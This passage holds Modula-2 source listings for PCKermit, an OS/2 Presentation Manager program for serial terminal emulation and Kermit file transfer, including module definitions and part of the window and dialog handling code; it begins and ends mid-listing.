WinDispatchMsg(AnchorBlock, Message); + END; + + WinDestroyWindow(FrameWindow); + END; + WinDestroyMsgQueue(MessageQueue); + END; + WinTerminate(AnchorBlock); + END; +END PCKermit. + +[LISTING TWO] + +DEFINITION MODULE Shell; + + FROM OS2DEF IMPORT + USHORT, HWND; + + FROM PMWIN IMPORT + MPARAM, MRESULT, SWP; + + EXPORT QUALIFIED + Class, Child, Title, FrameWindow, ClientWindow, + ChildFrameWindow, ChildClientWindow, Pos, SetPort, + WindowProc, ChildWindowProc; + + CONST + Class = "PCKermit"; + Child ="Child"; + Title = "PCKermit -- Microcomputer to Mainframe Communications"; + + + VAR + FrameWindow : HWND; + ClientWindow : HWND; + ChildFrameWindow : HWND; + ChildClientWindow : HWND; + Pos : SWP; (* Screen Dimensions: position & size *) + comport : CARDINAL; + + + PROCEDURE SetPort; + + PROCEDURE WindowProc ['WindowProc'] ( + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + + PROCEDURE ChildWindowProc ['ChildWindowProc'] ( + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + +END Shell. + +[LISTING THREE] + +DEFINITION MODULE Term; (* TVI950 Terminal Emulation For Kermit *) + + EXPORT QUALIFIED + WM_TERM, WM_TERMQUIT, + Dir, TermThrProc, InitTerm, PutKbdChar, PutPortChar; + + CONST + WM_TERM = 4000H; + WM_TERMQUIT = 4001H; + + + PROCEDURE Dir (path : ARRAY OF CHAR); + (* Displays a directory *) + + PROCEDURE TermThrProc; + (* Thread to get characters from port, put into buffer, send message *) + + PROCEDURE InitTerm; + (* Clear Screen, Home Cursor, Get Ready For Terminal Emulation *) + + PROCEDURE PutKbdChar (ch1, ch2 : CHAR); + (* Process a character received from the keyboard *) + + PROCEDURE PutPortChar (ch : CHAR); + (* Process a character received from the port *) + +END Term. + +[LISTING FOUR] + +DEFINITION MODULE Screen; +(* Module to perform "low level" screen functions (via AVIO) *) + + FROM PMAVIO IMPORT + HVPS; + + EXPORT QUALIFIED + NORMAL, HIGHLIGHT, REVERSE, attribute, ColorSet, hvps, + White, Green, Amber, Color1, Color2, + ClrScr, ClrEol, GotoXY, GetXY, + Right, Left, Up, Down, Write, WriteLn, WriteString, + WriteInt, WriteHex, WriteAtt; + + + VAR + NORMAL : CARDINAL; + HIGHLIGHT : CARDINAL; + REVERSE : CARDINAL; + attribute : CARDINAL; + ColorSet : CARDINAL; + hvps : HVPS; (* presentation space used by screen module *) + + + PROCEDURE White; + (* Sets up colors: Monochrome White *) + + PROCEDURE Green; + (* Sets up colors: Monochrome Green *) + + PROCEDURE Amber; + (* Sets up colors: Monochrome Amber *) + + PROCEDURE Color1; + (* Sets up colors: Blue, Red, Green *) + + PROCEDURE Color2; + (* Sets up colors: Green, Magenta, Cyan *) + + PROCEDURE ClrScr; + (* Clear the screen, and home the cursor *) + + PROCEDURE ClrEol; + (* clear from the current cursor position to the end of the line *) + + PROCEDURE Right; + (* move cursor to the right *) + + PROCEDURE Left; + (* move cursor to the left *) + + PROCEDURE Up; + (* move cursor up *) + + PROCEDURE Down; + (* move cursor down *) + + PROCEDURE GotoXY (col, row : CARDINAL); + (* position cursor at column, row *) + + PROCEDURE GetXY (VAR col, row : CARDINAL); + (* determine current cursor position *) + + PROCEDURE Write (c : CHAR); + (* Write a Character, Teletype Mode *) + + PROCEDURE WriteString (str : ARRAY OF CHAR); + (* Write String, Teletype Mode *) + + PROCEDURE WriteInt (n : INTEGER; s : CARDINAL); + (* Write Integer, Teletype Mode *) + + PROCEDURE WriteHex (n, s : CARDINAL); + (* Write a Hexadecimal Number, Teletype Mode *) + + PROCEDURE WriteLn; + (* Write , Teletype Mode *) + + PROCEDURE WriteAtt (c : CHAR); + (* write character and attribute at cursor position *) + +END Screen. + +[LISTING FIVE] + +DEFINITION MODULE PAD; (* Packet Assembler/Disassembler for Kermit *) + + FROM PMWIN IMPORT + MPARAM; + + EXPORT QUALIFIED + WM_PAD, PAD_Quit, PAD_Error, PacketType, yourNPAD, yourPADC, yourEOL, + Aborted, sFname, Send, Receive, DoPADMsg; + + CONST + WM_PAD = 5000H; + PAD_Quit = 0; + PAD_Error = 20; + + TYPE + (* PacketType used in both PAD and DataLink modules *) + PacketType = ARRAY [1..100] OF CHAR; + + VAR + (* yourNPAD, yourPADC, and yourEOL used in both PAD and DataLink *) + yourNPAD : CARDINAL; (* number of padding characters *) + yourPADC : CHAR; (* padding characters *) + yourEOL : CHAR; (* End Of Line -- terminator *) + sFname : ARRAY [0..20] OF CHAR; + Aborted : BOOLEAN; + + PROCEDURE Send; + (* Sends a file after prompting for filename *) + + PROCEDURE Receive; + (* Receives a file (or files) *) + + PROCEDURE DoPADMsg (mp1, mp2 [VALUE] : MPARAM); + (* Output messages for Packet Assembler/Disassembler *) + +END PAD. + +[LISTING SIX] + +DEFINITION MODULE DataLink; (* Sends and Receives Packets for PCKermit *) + + FROM PMWIN IMPORT + MPARAM; + + FROM PAD IMPORT + PacketType; + + EXPORT QUALIFIED + WM_DL, FlushUART, SendPacket, ReceivePacket, DoDLMsg; + + CONST + WM_DL = 6000H; + + PROCEDURE FlushUART; + (* ensure no characters left in UART holding registers *) + + PROCEDURE SendPacket (s : PacketType); + (* Adds SOH and CheckSum to packet *) + + PROCEDURE ReceivePacket (VAR r : PacketType) : BOOLEAN; + (* strips SOH and checksum -- returns status: TRUE= good packet *) + (* received; FALSE = timed out waiting for packet or checksum error *) + + PROCEDURE DoDLMsg (mp1, mp2 [VALUE] : MPARAM); + (* Process DataLink Messages *) + +END DataLink. + +[LISTING SEVEN] + +(*************************************************************) +(* *) +(* Copyright (C) 1988, 1989 *) +(* by Stony Brook Software *) +(* *) +(* All rights reserved. *) +(* *) +(*************************************************************) + +DEFINITION MODULE CommPort; + + TYPE + CommStatus = ( + Success, + InvalidPort, + InvalidParameter, + AlreadyReceiving, + NotReceiving, + NoCharacter, + FramingError, + OverrunError, + ParityError, + BufferOverflow, + TimeOut + ); + + BaudRate = ( + Baud110, + Baud150, + Baud300, + Baud600, + Baud1200, + Baud2400, + Baud4800, + Baud9600, + Baud19200 + ); + + DataBits = [7..8]; + StopBits = [1..2]; + Parity = (Even, Odd, None); + + + PROCEDURE InitPort(port : CARDINAL; speed : BaudRate; data : DataBits; + stop : StopBits; check : Parity) : CommStatus; + + PROCEDURE StartReceiving(port, bufsize : CARDINAL) : CommStatus; + + PROCEDURE StopReceiving(port : CARDINAL) : CommStatus; + + PROCEDURE GetChar(port : CARDINAL; VAR ch : CHAR) : CommStatus; + + PROCEDURE SendChar(port : CARDINAL; ch : CHAR; modem : BOOLEAN) : CommStatus; + +END CommPort. + +[LISTING EIGHT] + +DEFINITION MODULE Files; (* File I/O for Kermit *) + + FROM FileSystem IMPORT + File; + + EXPORT QUALIFIED + Status, FileType, Open, Create, CloseFile, Get, Put, DoWrite; + + TYPE + Status = (Done, Error, EOF); + FileType = (Input, Output); + + PROCEDURE Open (VAR f : File; name : ARRAY OF CHAR) : Status; + (* opens an existing file for reading, returns status *) + + PROCEDURE Create (VAR f : File; name : ARRAY OF CHAR) : Status; + (* creates a new file for writing, returns status *) + + PROCEDURE CloseFile (VAR f : File; Which : FileType) : Status; + (* closes a file after reading or writing *) + + PROCEDURE Get (VAR f : File; VAR ch : CHAR) : Status; + (* Reads one character from the file, returns status *) + + PROCEDURE Put (ch : CHAR); + (* Writes one character to the file buffer *) + + PROCEDURE DoWrite (VAR f : File) : Status; + (* Writes buffer to disk only if nearly full *) + +END Files. + +[LISTING NINE] + +IMPLEMENTATION MODULE Shell; + + FROM SYSTEM IMPORT + ADDRESS, ADR; + + IMPORT ASCII; + + FROM OS2DEF IMPORT + HWND, HDC, HPS, RECTL, USHORT, NULL, ULONG; + + FROM Term IMPORT + WM_TERM, WM_TERMQUIT, + Dir, TermThrProc, InitTerm, PutKbdChar, PutPortChar; + + FROM PAD IMPORT + WM_PAD, PAD_Quit, PAD_Error, DoPADMsg, Aborted, sFname, Send, Receive; + + FROM DataLink IMPORT + WM_DL, DoDLMsg; + + FROM Screen IMPORT + hvps, ColorSet, White, Green, Amber, Color1, Color2, ClrScr, WriteLn; + + FROM DosCalls IMPORT + DosCreateThread, DosSuspendThread, DosResumeThread, DosSleep; + + FROM PMAVIO IMPORT + VioCreatePS, VioAssociate, VioDestroyPS, VioShowPS, WinDefAVioWindowProc, + FORMAT_CGA, HVPS; + + FROM PMWIN IMPORT + MPARAM, MRESULT, SWP, PSWP, + WS_VISIBLE, FCF_TITLEBAR, FCF_SIZEBORDER, FCF_SHELLPOSITION, + WM_SYSCOMMAND, WM_MINMAXFRAME, SWP_MINIMIZE, HWND_DESKTOP, + WM_PAINT, WM_QUIT, WM_COMMAND, WM_INITDLG, WM_CONTROL, WM_HELP, + WM_INITMENU, WM_SIZE, WM_DESTROY, WM_CREATE, WM_CHAR, + BM_SETCHECK, MBID_OK, MB_OK, MB_OKCANCEL, + KC_CHAR, KC_CTRL, KC_VIRTUALKEY, KC_KEYUP, + SWP_SIZE, SWP_MOVE, SWP_MAXIMIZE, SWP_RESTORE, + MB_ICONQUESTION, MB_ICONASTERISK, MB_ICONEXCLAMATION, + FID_MENU, MM_SETITEMATTR, MM_QUERYITEMATTR, MIA_DISABLED, MIA_CHECKED, + WinCreateStdWindow, WinDestroyWindow, + WinOpenWindowDC, WinSendMsg, WinQueryDlgItemText, WinInvalidateRect, + WinDefWindowProc, WinBeginPaint, WinEndPaint, WinQueryWindowRect, + WinSetWindowText, WinSetFocus, WinDlgBox, WinDefDlgProc, WinDismissDlg, + WinMessageBox, WinPostMsg, WinWindowFromID, WinSendDlgItemMsg, + WinSetWindowPos, WinSetActiveWindow; + + FROM PMGPI IMPORT + GpiErase; + + FROM KH IMPORT + IDM_KERMIT, IDM_FILE, IDM_OPTIONS, IDM_SENDFN, ID_SENDFN, + IDM_DIR, IDM_CONNECT, IDM_SEND, IDM_REC, IDM_DIRPATH, ID_DIRPATH, + IDM_DIREND, IDM_QUIT, IDM_ABOUT, IDM_HELPMENU, IDM_TERMHELP, + IDM_COMPORT, IDM_BAUDRATE, IDM_DATABITS, IDM_STOPBITS, IDM_PARITY, + COM_OFF, ID_COM1, ID_COM2, PARITY_OFF, ID_EVEN, ID_ODD, ID_NONE, + DATA_OFF, ID_DATA7, ID_DATA8, STOP_OFF, ID_STOP1, ID_STOP2, + BAUD_OFF, ID_B110, ID_B150, ID_B300, ID_B600, ID_B1200, ID_B2400, + ID_B4800, ID_B9600, ID_B19K2, + IDM_COLORS, IDM_WHITE, IDM_GREEN, IDM_AMBER, IDM_C1, IDM_C2; + + FROM CommPort IMPORT + CommStatus, BaudRate, DataBits, StopBits, Parity, InitPort, + StartReceiving, StopReceiving; + + FROM Strings IMPORT + Assign, Append, AppendChar; + + + CONST + WM_SETMAX = 7000H; + WM_SETFULL = 7001H; + WM_SETRESTORE = 7002H; + NONE = 0; (* no port yet initialized *) + STKSIZE = 4096; + BUFSIZE = 4096; (* Port receive buffers: room for two full screens *) + PortError = "Port Is Already In Use -- EXIT? (Cancel Trys Another Port)"; + ESC = 33C; + + + VAR + FrameFlags : ULONG; + TermStack : ARRAY [1..STKSIZE] OF CHAR; + Stack : ARRAY [1..STKSIZE] OF CHAR; + TermThr : CARDINAL; + Thr : CARDINAL; + hdc : HDC; + frame_hvps, child_hvps : HVPS; + TermMode : BOOLEAN; + Path : ARRAY [0..60] OF CHAR; + Banner : ARRAY [0..40] OF CHAR; + PrevComPort : CARDINAL; + Settings : ARRAY [0..1] OF RECORD + baudrate : CARDINAL; + databits : CARDINAL; + parity : CARDINAL; + stopbits : CARDINAL; + END; + MP1, MP2 : MPARAM; + + + PROCEDURE SetFull; + (* Changes window to full size *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE); + END SetFull; + + + PROCEDURE SetRestore; + (* Changes window to full size FROM maximized *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE + SWP_RESTORE); + END SetRestore; + + + PROCEDURE SetMax; + (* Changes window to maximized *) + BEGIN + WinSetWindowPos (FrameWindow, 0, + Pos.x + 3, Pos.y + 3, Pos.cx - 6, Pos.cy - 6, + SWP_MOVE + SWP_SIZE + SWP_MAXIMIZE); + END SetMax; + + + PROCEDURE SetBanner; + (* Displays Abbreviated Program Title + Port Settings in Title Bar *) + + CONST + PortName : ARRAY [0..1] OF ARRAY [0..5] OF CHAR = + [["COM1:", 0C], ["COM2:", 0C]]; + BaudName : ARRAY [0..8] OF ARRAY [0..5] OF CHAR = + [["110", 0C], ["150", 0C], ["300", 0C], + ["600", 0C], ["1200", 0C], ["2400", 0C], + ["4800", 0C], ["9600", 0C], ["19200", 0C]]; + ParityName : ARRAY [0..2] OF CHAR = ['E', 'O', 'N']; + + BEGIN + WITH Settings[comport - COM_OFF] DO + Assign (Class, Banner); + Append (Banner, " -- "); + Append (Banner, PortName[comport - COM_OFF]); + Append (Banner, BaudName[baudrate - BAUD_OFF]); + AppendChar (Banner, ','); + AppendChar (Banner, ParityName[parity - PARITY_OFF]); + AppendChar (Banner, ','); + AppendChar (Banner, CHR ((databits - DATA_OFF) + 30H)); + AppendChar (Banner, ','); + AppendChar (Banner, CHR ((stopbits - STOP_OFF) + 30H)); + WinSetWindowText (FrameWindow, ADR (Banner)); + END; + END SetBanner; + + + PROCEDURE SetPort; + (* Sets The Communications Parameters Chosen By User *) + + VAR + status : CommStatus; + rc : USHORT; + + BEGIN + IF PrevComPort # NONE THEN + StopReceiving (PrevComPort - COM_OFF); + END; + + WITH Settings[comport - COM_OFF] DO + status := InitPort ( + comport - COM_OFF, + BaudRate (baudrate - BAUD_OFF), + DataBits (databits - DATA_OFF), + StopBits (stopbits - STOP_OFF), + Parity (parity - PARITY_OFF), + ); + END; + + IF status = Success THEN + StartReceiving (comport - COM_OFF, BUFSIZE); + PrevComPort := comport; + ELSE + rc := WinMessageBox (HWND_DESKTOP, FrameWindow, ADR (PortError), + 0, 0, MB_OKCANCEL + MB_ICONEXCLAMATION); + IF rc = MBID_OK THEN + WinPostMsg (FrameWindow, WM_QUIT, MPARAM (0), MPARAM (0)); + ELSE (* try the other port *) + IF comport = ID_COM1 THEN + comport := ID_COM2; + ELSE + comport := ID_COM1; + END; + SetPort; (* recursive call for retry *) + END; + END; + SetBanner; + END SetPort; + + + PROCEDURE MakeChild (msg : ARRAY OF CHAR); + (* Creates a child window for use by send or receive threads *) + + VAR + c_hdc : HDC; + + BEGIN + WinPostMsg (FrameWindow, WM_SETFULL, MPARAM (0), MPARAM (0)); + + Disable (IDM_CONNECT); + Disable (IDM_SEND); + Disable (IDM_REC); + Disable (IDM_DIR); + Disable (IDM_OPTIONS); + Disable (IDM_COLORS); + + (* Create a client window *) + FrameFlags := FCF_TITLEBAR + FCF_SIZEBORDER; + + ChildFrameWindow := WinCreateStdWindow ( + ClientWindow, (* handle of the parent window *) + WS_VISIBLE, (* the window style *) + FrameFlags, (* the window flags *) + ADR(Child), (* the window class *) + NULL, (* the title bar text *) + WS_VISIBLE, (* client window style *) + NULL, (* handle of resource module *) + IDM_KERMIT, (* resource id *) + ChildClientWindow (* returned client window handle *) + ); + + WinSetWindowPos (ChildFrameWindow, 0, + Pos.cx DIV 4, Pos.cy DIV 4, + Pos.cx DIV 2, Pos.cy DIV 2 - 3, + SWP_MOVE + SWP_SIZE); + + WinSetWindowText (ChildFrameWindow, ADR (msg)); + + WinSetActiveWindow (HWND_DESKTOP, ChildFrameWindow); + + c_hdc := WinOpenWindowDC (ChildClientWindow); + hvps := child_hvps; + VioAssociate (c_hdc, hvps); + ClrScr; (* clear the hvio window *) + END MakeChild; + + + PROCEDURE Disable (item : USHORT); + (* Disables and "GREYS" a menu item *) + + VAR + h : HWND; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_DISABLED; MP2.W2 := MIA_DISABLED; + WinSendMsg (h, MM_SETITEMATTR, MP1, MP2); + END Disable; + + + PROCEDURE Enable (item : USHORT); + (* Enables a menu item *) + + VAR + h : HWND; + atr : USHORT; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_DISABLED; MP2.W2 := MIA_DISABLED; + atr := USHORT (WinSendMsg (h, MM_QUERYITEMATTR, MP1, MP2)); + atr := USHORT (BITSET (atr) * (BITSET (MIA_DISABLED) / BITSET (-1))); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_DISABLED; MP2.W2 := atr; + WinSendMsg (h, MM_SETITEMATTR, MP1, MP2); + END Enable; + + + PROCEDURE Check (item : USHORT); + (* Checks a menu item -- indicates that it is selected *) + + VAR + h : HWND; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_CHECKED; MP2.W2 := MIA_CHECKED; + WinSendMsg (h, MM_SETITEMATTR, MP1, MP2); + END Check; + + + PROCEDURE UnCheck (item : USHORT); + (* Remove check from a menu item *) + + VAR + h : HWND; + atr : USHORT; + + BEGIN + h := WinWindowFromID (FrameWindow, FID_MENU); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_CHECKED; MP2.W2 := MIA_CHECKED; + atr := USHORT (WinSendMsg (h, MM_QUERYITEMATTR, MP1, MP2)); + atr := USHORT (BITSET (atr) * (BITSET (MIA_CHECKED) / BITSET (-1))); + MP1.W1 := item; MP1.W2 := 1; + MP2.W1 := MIA_CHECKED; MP2.W2 := atr; + WinSendMsg (h, MM_SETITEMATTR, MP1, MP2); + END UnCheck; + + + PROCEDURE DoMenu (hwnd : HWND; item [VALUE] : MPARAM); + (* Processes Most Menu Interactions *) + + VAR + rcl : RECTL; + rc : USHORT; + + BEGIN + CASE CARDINAL (item.W1) OF + IDM_DIR: + SetFull; + WinQueryWindowRect (hwnd, rcl); + WinDlgBox (HWND_DESKTOP, hwnd, PathDlgProc, 0, IDM_DIRPATH, 0); + hvps := frame_hvps; + VioAssociate (hdc, hvps); + Dir (Path); + WinDlgBox (HWND_DESKTOP, hwnd, DirEndDlgProc, 0, IDM_DIREND, 0); + VioAssociate (0, hvps); + WinInvalidateRect (hwnd, rcl, 0); + | IDM_CONNECT: + TermMode := TRUE; + Disable (IDM_CONNECT); + Disable (IDM_SEND); + Disable (IDM_REC); + Disable (IDM_DIR); + Disable (IDM_OPTIONS); + Disable (IDM_COLORS); + (* MAXIMIZE Window -- Required for Terminal Emulation *) + SetMax; + hvps := frame_hvps; + VioAssociate (hdc, hvps); + DosResumeThread (TermThr); + InitTerm; + | IDM_SEND: + WinDlgBox (HWND_DESKTOP, hwnd, SendFNDlgProc, 0, IDM_SENDFN, 0); + MakeChild ("Send a File"); + DosCreateThread (Send, Thr, ADR (Stack[STKSIZE])); + | IDM_REC: + MakeChild ("Receive a File"); + DosCreateThread (Receive, Thr, ADR (Stack[STKSIZE])); + | IDM_QUIT: + rc := WinMessageBox (HWND_DESKTOP, ClientWindow, + ADR ("Do You Really Want To EXIT PCKermit?"), + ADR ("End Session"), 0, MB_OKCANCEL + MB_ICONQUESTION); + IF rc = MBID_OK THEN + StopReceiving (comport - COM_OFF); + WinPostMsg (hwnd, WM_QUIT, MPARAM (0), MPARAM (0)); + END; + | IDM_COMPORT: + WinDlgBox (HWND_DESKTOP, hwnd, ComDlgProc, 0, IDM_COMPORT, 0); + SetPort; + | IDM_BAUDRATE: + WinDlgBox (HWND_DESKTOP, hwnd, BaudDlgProc, 0, IDM_BAUDRATE, 0); + SetPort; + | IDM_DATABITS: + WinDlgBox (HWND_DESKTOP, hwnd, DataDlgProc, 0, IDM_DATABITS, 0); + SetPort; + | IDM_STOPBITS: + WinDlgBox (HWND_DESKTOP, hwnd, StopDlgProc, 0, IDM_STOPBITS, 0); + SetPort; + | IDM_PARITY: + WinDlgBox (HWND_DESKTOP, hwnd, ParityDlgProc, 0, IDM_PARITY, 0); + SetPort; + | IDM_WHITE: + UnCheck (ColorSet); + ColorSet := IDM_WHITE; + Check (ColorSet); + White; + | IDM_GREEN: + UnCheck (ColorSet); + ColorSet := IDM_GREEN; + Check (ColorSet); + Green; + | IDM_AMBER: + UnCheck (ColorSet); + ColorSet := IDM_AMBER; + Check (ColorSet); + Amber; + | IDM_C1: + UnCheck (ColorSet); + ColorSet := IDM_C1; + Check (ColorSet); + Color1; + | IDM_C2: + UnCheck (ColorSet); + ColorSet := IDM_C2; + Check (ColorSet); + Color2; + | IDM_ABOUT: + WinDlgBox (HWND_DESKTOP, hwnd, AboutDlgProc, 0, IDM_ABOUT, 0); + ELSE + (* Don't do anything... *) + END; + END DoMenu; + + + PROCEDURE ComDlgProc ['ComDlgProc'] ( + (* Process Dialog Box for choosing COM1/COM2 *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, comport, BM_SETCHECK, + MPARAM (1), MPARAM (0)); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, comport)); + RETURN 1; + | WM_CONTROL: + comport := mp1.W1; + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END ComDlgProc; + + + PROCEDURE BaudDlgProc ['BaudDlgProc'] ( + (* Process Dialog Box for choosing Baud Rate *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, baudrate, BM_SETCHECK, + MPARAM (1), MPARAM (0)); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, baudrate)); + RETURN 1; + | WM_CONTROL: + baudrate := mp1.W1; + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END BaudDlgProc; + + + PROCEDURE DataDlgProc ['DataDlgProc'] ( + (* Process Dialog Box for choosing 7 or 8 data bits *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, databits, BM_SETCHECK, + MPARAM (1), MPARAM (0)); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, databits)); + RETURN 1; + | WM_CONTROL: + databits := mp1.W1; + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END DataDlgProc; + + + PROCEDURE StopDlgProc ['StopDlgProc'] ( + (* Process Dialog Box for choosing 1 or 2 stop bits *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, stopbits, BM_SETCHECK, + MPARAM (1), MPARAM (0)); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, stopbits)); + RETURN 1; + | WM_CONTROL: + stopbits := mp1.W1; + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END StopDlgProc; + + + PROCEDURE ParityDlgProc ['ParityDlgProc'] ( + (* Process Dialog Box for choosing odd, even, or no parity *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + WITH Settings[comport - COM_OFF] DO + CASE msg OF + WM_INITDLG: + WinSendDlgItemMsg (hwnd, parity, BM_SETCHECK, + MPARAM (1), MPARAM (0)); + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, parity)); + RETURN 1; + | WM_CONTROL: + parity := mp1.W1; + RETURN 0; + | WM_COMMAND: + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END; + END ParityDlgProc; + + + PROCEDURE AboutDlgProc ['AboutDlgProc'] ( + (* Process "About" Dialog Box *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END AboutDlgProc; + + + PROCEDURE SendFNDlgProc ['SendFNDlgProc'] ( + (* Process Dialog Box that obtains send filename from user *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, ID_SENDFN)); + RETURN 1; + | WM_COMMAND: + WinQueryDlgItemText (hwnd, ID_SENDFN, 20, ADR (sFname)); + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END SendFNDlgProc; + + + PROCEDURE PathDlgProc ['PathDlgProc'] ( + (* Process Dialog Box that obtains directory path from user *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + CASE msg OF + WM_INITDLG: + WinSetFocus (HWND_DESKTOP, WinWindowFromID (hwnd, ID_DIRPATH)); + RETURN 1; + | WM_COMMAND: + WinQueryDlgItemText (hwnd, ID_DIRPATH, 60, ADR (Path)); + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END PathDlgProc; + + + PROCEDURE DirEndDlgProc ['DirEndDlgProc'] ( + (* Process Dialog Box to allow user to cancel directory *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END DirEndDlgProc; + + + PROCEDURE HelpDlgProc ['HelpDlgProc'] ( + (* Process Dialog Boxes for the HELP *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END HelpDlgProc; + + + PROCEDURE KeyTranslate (mp1, mp2 [VALUE] : MPARAM; VAR c1, c2 : CHAR) : BOOLEAN; + (* Translates WM_CHAR message into ascii keystroke *) + + VAR + code : CARDINAL; + fs : BITSET; + VK, KU, CH, CT : BOOLEAN; + + BEGIN + fs := BITSET (mp1.W1); (* flags *) + VK := (fs * BITSET (KC_VIRTUALKEY)) # {}; + KU := (fs * BITSET (KC_KEYUP)) # {}; + CH := (fs * BITSET (KC_CHAR)) # {}; + CT := (fs * BITSET (KC_CTRL)) # {}; + IF (NOT KU) THEN + code := mp2.W1; (* character code *) + c1 := CHR (code); + c2 := CHR (code DIV 256); + IF ORD (c1) = 0E0H THEN (* function *) + c1 := 0C; + END; + IF CT AND (NOT CH) AND (NOT VK) AND (code # 0) THEN + c1 := CHR (CARDINAL ((BITSET (ORD (c1)) * BITSET (1FH)))); + END; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END KeyTranslate; + + + PROCEDURE WindowProc ['WindowProc'] ( + (* Main Window Procedure -- Handles message from PM and elsewhere *) + hwnd : HWND; + msg : USHORT; + mp1 [VALUE] : MPARAM; + mp2 [VALUE] : MPARAM) : MRESULT [LONG, WINDOWS]; + + VAR + ch : CHAR; + hps : HPS; + pswp : PSWP; + c1, c2 : CHAR; + NullRectl [0:0] : RECTL; + + BEGIN + CASE msg OF + WM_HELP: + IF TermMode THEN + WinDlgBox (HWND_DESKTOP, hwnd, HelpDlgProc, + 0, IDM_TERMHELP, 0); + ELSE + WinDlgBox (HWND_DESKTOP, hwnd, HelpDlgProc, + 0, IDM_HELPMENU, 0); + END; + RETURN 0; + | WM_SETFULL: + SetFull; + RETURN 0; + | WM_SETRESTORE: + SetRestore; + RETURN 0; + | WM_SETMAX: + SetMax; + RETURN 0; + | WM_MINMAXFRAME: + pswp := PSWP (mp1); + IF BITSET (pswp^.fs) * BITSET (SWP_MINIMIZE) # {} THEN + (* Don't Display Port Settings While Minimized *) + WinSetWindowText (FrameWindow, ADR (Title)); + ELSE + WinSetWindowText (FrameWindow, ADR (Banner)); + IF TermMode AND + (BITSET (pswp^.fs) * BITSET (SWP_RESTORE) # {}) THEN + 